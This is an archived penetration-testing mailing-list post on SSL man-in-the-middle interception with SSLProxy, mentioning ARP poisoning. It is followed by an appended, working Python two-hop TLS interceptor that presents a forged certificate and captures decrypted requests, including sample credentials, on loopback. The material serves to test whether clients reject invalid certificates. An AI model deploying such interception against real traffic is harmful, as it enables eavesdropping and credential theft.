Penetration Testing mailing list archives

RE: SSL MITM not on port 443


From: Frank Knobbe <frank () knobbe us>
Date: Fri, 29 Aug 2008 20:58:29 -0500

On Thu, 2008-08-28 at 15:56 +0200, christopher.riley () r-it at wrote:
> I've confirmed that I can get this working on a normal SSL based web
> server (obviously by agreeing to the insecure certificate). However I
> still had no luck with Ettercap on this service. I'm trying now with an
> iptables rule to forward between port 443 on the MITM machine to the
> target server on a higher port. It's just getting a chance to squeeze it
> in amongst the other things that need doing. I'll set aside some time at
> the weekend to throw this on my lab system at home and get it working
> somehow.

Why so complicated? Intercepting SSL with the ability to serve your own
certificates is easily done with SSLProxy. Older versions only proxied
clear-text listener ports into an SSL connection and you needed to use
OpenSSL to do the reverse. But newer versions of SSLProxy also allow you
to supply a certificate and listen as an SSL endpoint connecting back to
a clear-text port.


(client) --[SSL]--> (server)

To intercept, change to:

(client) --[SSL]--> (SSLProxy) --[clear-text]--> (SSLProxy) --[SSL]--> (server)

You can sniff the traffic between the SSLProxies for clear-text
analysis. Further, you can configure the left-side SSLProxy with any
certificate you create. That should allow you to test if your client
application handles invalid certificates correctly.

I've used SSLProxy and OpenSSL in pentests almost a decade ago before
ready-made SSL MITM tools like dsniff were available. They work quite
nicely. You can run them both on the same machine. However, in one
instance, I needed to permit a 2nd and 3rd machine to sniff the
intercepted clear-text traffic, so we ran SSLProxy on one box and
OpenSSL on another, and transmitted the clear-text across a hub that
allowed the other machines to sniff the traffic too. A handy setup,
especially when combined with ARP poisoning :)

Cheers,
Frank
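
The two-hop chain Frank describes, as an added example that is not code from the original post and not SSLProxy's or OpenSSL's own code: the two hops are written here with Python's ssl module so the whole thing runs on one box. It assumes the openssl command-line tool is on PATH (for creating two throwaway self-signed certificates, one for the "real" service and one forged by the interceptor), and uses loopback ephemeral ports in place of the MITM machine and the target's non-443 port. The echo service, the HTTP request and the Basic credentials in it are constructed for the example. The left hop terminates TLS with the forged certificate and copies everything to a tap list (what a sniffer on the clear-text segment would see); the right hop opens a fresh TLS session toward the real service. It also runs the check mentioned in the post: a client that verifies the chain against the real certificate refuses the forged one, while a client that "agrees to the insecure certificate" has its request read in the clear.

```python
"""Two-hop TLS interception chain, written with Python's ssl module.
Added example; SSLProxy and OpenSSL are the tools in the post, not this code.

  (client) --[TLS]--> terminator --[clear-text tap]--> originator --[TLS]--> (server)

Assumes the openssl CLI is installed (used only to mint throwaway certificates).
"""
import os, shutil, socket, ssl, subprocess, tempfile, threading

BUFSIZE = 4096
TIMEOUT = 5.0   # seconds; a stuck relay ends instead of hanging forever
# Constructed request for the example; the Basic credentials are fake.
REQUEST = b"GET /secret HTTP/1.0\r\nAuthorization: Basic dXNlcjpodW50ZXIy\r\n\r\n"


def make_self_signed(directory, cn):
    """Throwaway self-signed certificate + key via the openssl CLI."""
    key, crt = (os.path.join(directory, cn + ext) for ext in (".key", ".crt"))
    subprocess.run(["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
                    "-keyout", key, "-out", crt, "-days", "1", "-subj", "/CN=" + cn],
                   check=True, capture_output=True)
    return crt, key


def _pump(src, dst, tap, direction):
    """Copy src -> dst until EOF, recording each chunk in tap (the sniffer's view)."""
    try:
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            if tap is not None:
                tap.append((direction, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):          # wake the thread pumping the other direction
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass


def _relay(client, upstream, tap=None):
    t = threading.Thread(target=_pump, args=(upstream, client, tap, "s2c"), daemon=True)
    t.start()
    _pump(client, upstream, tap, "c2s")
    t.join()
    client.close()
    upstream.close()


def _serve(handler):
    """Listen on an ephemeral loopback port (stands in for the 'higher port')."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def loop():
        while True:
            conn, _ = srv.accept()
            conn.settimeout(TIMEOUT)
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def start_tls_server(certfile, keyfile):
    """The real service (constructed): answers one request over TLS and closes."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile, keyfile)

    def handle(conn):
        tls = None
        try:
            tls = ctx.wrap_socket(conn, server_side=True)
            body = b"you sent: " + tls.recv(BUFSIZE)
            tls.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (len(body), body))
        except OSError:
            pass                      # e.g. handshake aborted by a verifying client
        finally:
            (conn if tls is None else tls).close()
    return _serve(handle)


def start_tls_terminator(certfile, keyfile, upstream_port):
    """Left hop: presents OUR certificate to the client, forwards clear-text."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile, keyfile)
    tap = []

    def handle(conn):
        try:
            tls = ctx.wrap_socket(conn, server_side=True)
        except OSError:               # client refused the forged cert: handshake failed
            conn.close()
            return
        plain = socket.create_connection(("127.0.0.1", upstream_port), timeout=TIMEOUT)
        _relay(tls, plain, tap)
    return _serve(handle), tap


def start_tls_originator(server_port):
    """Right hop: takes clear-text, opens a fresh TLS session to the real server."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE   # the interceptor accepts whatever the target presents

    def handle(conn):
        raw = socket.create_connection(("127.0.0.1", server_port), timeout=TIMEOUT)
        try:
            tls = ctx.wrap_socket(raw)
        except OSError:
            raw.close()
            conn.close()
            return
        _relay(conn, tls)
    return _serve(handle)


def client_fetch(port, request, cafile=None):
    """cafile given: a client that verifies the chain against that trust anchor.
    cafile None: a client that 'agrees to the insecure certificate'."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # keeps the example to the chain check
    if cafile:
        ctx.load_verify_locations(cafile)   # verify_mode stays CERT_REQUIRED
    else:
        ctx.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection(("127.0.0.1", port), timeout=TIMEOUT)
    try:
        tls = ctx.wrap_socket(raw)    # raises SSLCertVerificationError on a bad chain
    except OSError:
        raw.close()
        raise
    chunks = []
    with tls:
        tls.sendall(request)
        try:
            while True:
                data = tls.recv(BUFSIZE)
                if not data:
                    break
                chunks.append(data)
        except OSError:
            pass                      # peer closed without close_notify; response already read
    return b"".join(chunks)


def demo():
    """Wire the chain on loopback; returns None when openssl is not installed."""
    if shutil.which("openssl") is None:
        return None
    with tempfile.TemporaryDirectory() as tmp:
        real_crt, real_key = make_self_signed(tmp, "real-server")
        fake_crt, fake_key = make_self_signed(tmp, "attacker")
        server_port = start_tls_server(real_crt, real_key)
        mitm_port, tap = start_tls_terminator(fake_crt, fake_key,
                                              start_tls_originator(server_port))
        lax = client_fetch(mitm_port, REQUEST)                  # accepted the forged cert
        try:
            client_fetch(mitm_port, REQUEST, cafile=real_crt)   # a verifying client
            strict_rejected = False
        except ssl.SSLCertVerificationError:
            strict_rejected = True
        direct = client_fetch(server_port, REQUEST, cafile=real_crt)  # same client, real server
    return {"sniffed": b"".join(d for who, d in tap if who == "c2s"),
            "lax_response": lax, "strict_rejected": strict_rejected,
            "direct_response": direct}


if __name__ == "__main__":
    print(demo())
```

The tap list is the in-process stand-in for the hub between the two SSLProxies: anything appended there is exactly what a sniffer on that segment would capture. Note that the right hop deliberately runs with CERT_NONE; that is the interceptor's side of the chain, not the client under test.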

